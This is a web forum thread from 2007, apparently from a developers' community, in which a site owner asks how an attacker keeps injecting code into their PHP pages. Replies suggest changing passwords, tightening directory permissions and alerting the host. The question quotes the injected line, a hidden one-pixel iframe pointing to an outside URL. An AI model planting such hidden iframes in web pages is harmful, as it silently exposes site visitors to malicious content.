Menu
Community /Pin to ProfileBookmark
@NogDogApr 04.2007 — #The first thing to do is to change your login and FTP passwords that you use to access the webserver. Secondly, if on a UNIX/Linux web server, you can change the permissions on any directories that do not need to be written to by your scripts to 755 (read/write/execute by owner, read/execute by others). This will help prevent anyone else who has an account on the same webserver from having a script write to your directories. If you should have to allow others to have write permission on a given directory, you can still set permissions on specific files that you don't want the world to have write access on.
You probably should also alert the web host administrator (assuming it's not you) that you were hacked, as it's possible it was done by someone hacking into the server as root (though hopefully they only allow root access from specific IP's, but you never know).
PS: As to whether any of your scripts have security loopholes, it's pretty hard to say without seeing the scripts, though my first guess would be that they're not the problem (but it's still a possibility).
[RESOLVED] Getting Hacked need some help.
I know a little php to get me by but I must have vulnarbilities. Someone keeps adding small pieces of code to my index page and to a header file for the rest of my site. Somehow there adding a line like this right after the body tag.
[CODE]<!– ~ –><iframe src=’http://some-url-that-says-my-ip-is-blocked’ width=1 height=1 style=’visibility: hidden;’></iframe><!– ~ –>
Can anyone explain to me how they are doing this or at least what I should look for in my php code to prevent this? Thanks
Sign in
to post a comment5 Comments(s) ↴
0
@NogDogApr 04.2007 — #You probably should also alert the web host administrator (assuming it's not you) that you were hacked, as it's possible it was done by someone hacking into the server as root (though hopefully they only allow root access from specific IP's, but you never know).
PS: As to whether any of your scripts have security loopholes, it's pretty hard to say without seeing the scripts, though my first guess would be that they're not the problem (but it's still a possibility).